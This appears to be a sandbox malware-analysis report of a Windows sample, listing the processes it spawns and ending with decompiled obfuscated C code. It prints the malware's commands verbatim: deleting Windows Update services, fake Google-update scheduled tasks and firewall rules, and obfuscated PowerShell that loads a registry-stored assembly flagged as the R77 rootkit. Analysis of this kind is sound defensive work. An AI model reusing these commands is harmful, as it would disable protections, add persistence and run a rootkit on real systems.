Commandline:	sc stop UsoSvc
Imagebase:	0x7ff756460000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4424, Parent PID: 272

General

Target ID:	24
Start time:	11:17:49
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=
Imagebase:	0xc30000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3772, Parent PID: 5984

General

Target ID:	25
Start time:	11:17:49
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2912, Parent PID: 4948

General

Target ID:	26
Start time:	11:17:49
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2216, Parent PID: 272

General

Target ID:	27
Start time:	11:17:49
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0x11c0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3428, Parent PID: 4424

General

Target ID:	28
Start time:	11:17:49
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c8a30000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 4896, Parent PID: 5560

General

Target ID:	29
Start time:	11:17:49
Start date:	26/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff646370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3664, Parent PID: 2216

General

Target ID:	30
Start time:	11:17:49
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 4360, Parent PID: 6068

General

Target ID:	31
Start time:	11:17:49
Start date:	26/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff756460000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 3084, Parent PID: 5560

General

Target ID:	32
Start time:	11:17:50
Start date:	26/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff646370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 3796, Parent PID: 272

General

Target ID:	33
Start time:	11:17:50
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
Imagebase:	0x11c0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 4496, Parent PID: 6068

General

Target ID:	34
Start time:	11:17:50
Start date:	26/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff756460000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5008, Parent PID: 3796

General

Target ID:	35
Start time:	11:17:50
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 204, Parent PID: 1084

General

Target ID:	36
Start time:	11:17:50
Start date:	26/11/2022
Path:	C:\Users\user\AppData\Local\Google\chrome.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Google\chrome.exe
Imagebase:	0x870000
File size:	6423552 bytes
MD5 hash:	8CD1EA50F8F4C45055400E70DA52B326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: GoogleUpdate.exePID: 5128, Parent PID: 272

General

Target ID:	37
Start time:	11:17:51
Start date:	26/11/2022
Path:	C:\Windows\GoogleUpdate.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\GoogleUpdate.exe
Imagebase:	0xe40000
File size:	154456 bytes
MD5 hash:	9A66A3DE2589F7108426AF37AB7F6B41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 5332, Parent PID: 6068

General

Target ID:	38
Start time:	11:17:52
Start date:	26/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff756460000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 5304, Parent PID: 5560

General

Target ID:	39
Start time:	11:17:52
Start date:	26/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff646370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 5320, Parent PID: 6068

General

Target ID:	40
Start time:	11:17:53
Start date:	26/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff756460000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 6052, Parent PID: 5560

General

Target ID:	41
Start time:	11:17:53
Start date:	26/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff646370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 5636, Parent PID: 6068

General

Target ID:	42
Start time:	11:17:53
Start date:	26/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Imagebase:	0x7ff6ffff0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: fl.exePID: 1776, Parent PID: 5440

General

Target ID:	43
Start time:	11:17:57
Start date:	26/11/2022
Path:	C:\Users\user\AppData\Local\Temp\fl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fl.exe"
Imagebase:	0x2b0000
File size:	2525912 bytes
MD5 hash:	098501D92E932B69246D3CC2AC8118BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 54%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 2236, Parent PID: 6068

General

Target ID:	44
Start time:	11:17:57
Start date:	26/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Imagebase:	0x7ff783ac0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 4436, Parent PID: 6068

General

Target ID:	45
Start time:	11:18:00
Start date:	26/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Imagebase:	0x7ff783ac0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 5196, Parent PID: 6068

General

Target ID:	47
Start time:	11:18:01
Start date:	26/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Imagebase:	0x7ff783ac0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: netsh.exePID: 860, Parent PID: 5128

General

Target ID:	49
Start time:	11:18:01
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL
Imagebase:	0x1280000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: netsh.exePID: 5192, Parent PID: 5128

General

Target ID:	50
Start time:	11:18:02
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Imagebase:	0x1280000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4360, Parent PID: 860

General

Target ID:	51
Start time:	11:18:02
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 4904, Parent PID: 6068

General

Target ID:	52
Start time:	11:18:02
Start date:	26/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff783ac0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: netsh.exePID: 5140, Parent PID: 5128

General

Target ID:	53
Start time:	11:18:02
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Imagebase:	0x1280000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5136, Parent PID: 5192

General

Target ID:	54
Start time:	11:18:02
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 2964, Parent PID: 1084

General

Target ID:	55
Start time:	11:18:02
Start date:	26/11/2022
Path:	C:\Users\user\AppData\Local\Google\chrome.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Google\chrome.exe
Imagebase:	0x870000
File size:	6423552 bytes
MD5 hash:	8CD1EA50F8F4C45055400E70DA52B326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5208, Parent PID: 5140

General

Target ID:	56
Start time:	11:18:02
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: dialer.exePID: 712, Parent PID: 5100

General

Target ID:	57
Start time:	11:18:19
Start date:	26/11/2022
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dialer.exe
Imagebase:	0x7ff70e450000
File size:	36864 bytes
MD5 hash:	0EC74656A7F7667DD94C76081B111827
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5792, Parent PID: 5100

General

Target ID:	58
Start time:	11:18:20
Start date:	26/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
Imagebase:	0x7ff7fbaf0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1064, Parent PID: 5792

General

Target ID:	59
Start time:	11:18:21
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 64, Parent PID: 1084

General

Target ID:	60
Start time:	11:18:21
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Imagebase:	0xc30000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1880, Parent PID: 1084

General

Target ID:	61
Start time:	11:18:21
Start date:	26/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Imagebase:	0x7ff7fbaf0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 0000003D.00000002.635145721.000001CD24AB9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4644, Parent PID: 64

General

Target ID:	62
Start time:	11:18:21
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4976, Parent PID: 1880

General

Target ID:	63
Start time:	11:18:22
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2180, Parent PID: 5792

General

Target ID:	64
Start time:	11:18:30
Start date:	26/11/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Imagebase:	0x7ff6acb80000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: dllhost.exePID: 576, Parent PID: 556

General

Target ID:	65
Start time:	11:18:53
Start date:	26/11/2022
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{7a77888d-cd31-4f67-91ce-46090c964f53}
Imagebase:
File size:	20888 bytes
MD5 hash:	2528137C6745C4EADD87817A1909677E
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000041.00000000.537508242.000000014001C000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000041.00000000.541258672.000000014001C000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000041.00000000.535294108.000000014001C000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000041.00000000.539459041.000000014001C000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: updater.exePID: 3724, Parent PID: 1084

General

Target ID:	67
Start time:	11:19:00
Start date:	26/11/2022
Path:	C:\Program Files\Google\Chrome\updater.exe
Wow64 process (32bit):
Commandline:	C:\Program Files\Google\Chrome\updater.exe
Imagebase:
File size:	2884609 bytes
MD5 hash:	EB27BB8CFA99D659E4FE023E9002ECD1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 85%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: winlogon.exePID: 556, Parent PID: 576

General

Target ID:	68
Start time:	11:19:02
Start date:	26/11/2022
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff712540000
File size:	677376 bytes
MD5 hash:	F9017F2DC455AD373DF036F5817A8870
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000044.00000000.554210864.00000254B29D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: hZDPlQwZ9D.exePID: 5852, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	20.6%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	11.1%
Total number of Nodes:	1393
Total number of Limit Nodes:	9

Executed Functions

Function 004042F0 Relevance: 54.6, APIs: 21, Strings: 9, Instructions: 2125
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E004042F0() {
				char _v5;
				signed int _v12;
				signed char* _v16;
				char* _v20;
				signed int* _v24;
				short* _v28;
				signed char* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed short* _v44;
				signed int _v48;
				signed int _v52;
				signed int* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				signed int _v72;
				signed int _v73;
				short* _v80;
				signed int _v84;
				intOrPtr _v88;
				signed char* _v92;
				void* _v96;
				short _v100;
				signed short* _v104;
				signed int _v105;
				short _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr* _v124;
				int _v128;
				signed int _v132;
				intOrPtr _v136;
				void _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int* _v152;
				signed int _v156;
				long _v160;
				signed short* _v164;
				signed int _v168;
				short _v172;
				signed int _v176;
				intOrPtr _v184;
				char _v188;
				signed int _v189;
				signed int _v190;
				signed int _v196;
				void _v200;
				signed int _v201;
				void* _v208;
				signed int _v209;
				signed int* _v216;
				intOrPtr _v220;
				signed int _v224;
				int _v228;
				intOrPtr* _v232;
				signed int _v240;
				signed int _v244;
				intOrPtr _v248;
				signed char* _v252;
				signed int _v256;
				int _v260;
				signed int _v261;
				signed int _v268;
				short _v272;
				signed int _v273;
				signed int _v280;
				signed int _v284;
				signed short* _v288;
				char _v289;
				void* _v290;
				long _v296;
				signed int _v300;
				signed int _v304;
				intOrPtr _v308;
				signed int _v309;
				short* _v316;
				signed int _v320;
				signed int* _v328;
				signed int* _v332;
				signed int _v336;
				signed int* _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				signed int _v352;
				signed char* _v356;
				signed int _v360;
				char _v361;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				char* _v380;
				signed int* _v384;
				signed int _v388;
				char _v392;
				signed int _v396;
				signed int _v400;
				char _v404;
				signed int _v408;
				intOrPtr _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				char _v428;
				unsigned int _v432;
				signed int _t1283;
				signed int _t1362;
				int _t1433;
				signed int _t1666;
				signed int _t1702;
				signed char _t2104;
				signed char _t2256;
				signed int _t2332;
				signed int _t2741;

				_v190 = 0x50;
				_v273 = 0x27;
				_v360 = 0x6491;
				_v73 = _v190;
				_v196 = 0xdb0;
				_v284 = 0x2390;
				_v352 = 0x380;
				_v64 = _v360;
				if(_v273 >= 0x59) {
					_v176 = _v284;
					_v196 = (_v196 & 0x0000ffff) - 0xc75;
					_v273 = _v273 + 0x73;
					_push(_v190 & 0x000000ff);
					E00404200(_v73 & 0x000000ff, _v273 & 0x000000ff);
					L90:
					_t1283 =  &_v73;
					__imp__#152(_t1283);
					_v176 = _t1283;
					_push(_v190 & 0x000000ff);
					E00404200(_v190 & 0x000000ff, _v273 & 0x000000ff);
					return _v84;
				}
				_v268 = _v352;
				_v348 = 0xc085;
				 *0x413004 = _v64 & _v360;
				_v164 =  &_v196;
				_v40 =  &_v64;
				_v248 = 0x84de;
				_v140 = _v284;
				_v209 = _v73;
				if(_v360 *  *0x413004 <=  *_v40 << _v64) {
					if(( *_v164 & 0x0000ffff) >> 0xb7 == (_v196 & 0x0000ffff)) {
						 *_v40 = _v360 - _v64;
						 *0x413004 =  *_v40 & _v64;
					}
					L88:
					_v196 =  *_v164 & 0x0000ffff ^ 0x00000729;
					_v360 =  *_v40 | _v64;
					_v140 = _v176 + _v284;
					E00404260();
					goto L90;
				}
				while(_v348 < 0x10236) {
					 *_v164 = (_v196 & 0x0000ffff) + 0x57d;
					_v140 = _v176 - _v284;
					_v64 = _v360 +  *_v40;
					_v268 = _v352 - 0x695;
					_v273 = _v273 << 1;
					_v196 = ( *_v164 & 0x0000ffff) >> 0xd;
					_v209 = _v190 & 0x000000ff | _v73 & 0x000000ff;
					_v284 = _v140 ^ _v176;
					 *_v40 = _v64 & _v360;
					 *_v40 = _v360 + _v64;
					_v140 = _v176 - _v284;
					_v360 = _v64 +  *_v40;
					_v196 = ( *_v164 & 0x0000ffff) - 0x6bc;
					_v73 = _v190 & 0x000000ff & _v209 & 0x000000ff;
					 *_v40 =  *_v40 + _v360;
					_v176 = _v284;
					 *_v40 = _v360 - _v64;
					 *0x413004 =  *_v40 + _v360;
					_v209 = (_v73 & 0x000000ff) - (_v190 & 0x000000ff);
					_v196 =  *_v164 & 0x0000ffff ^ 0x00000295;
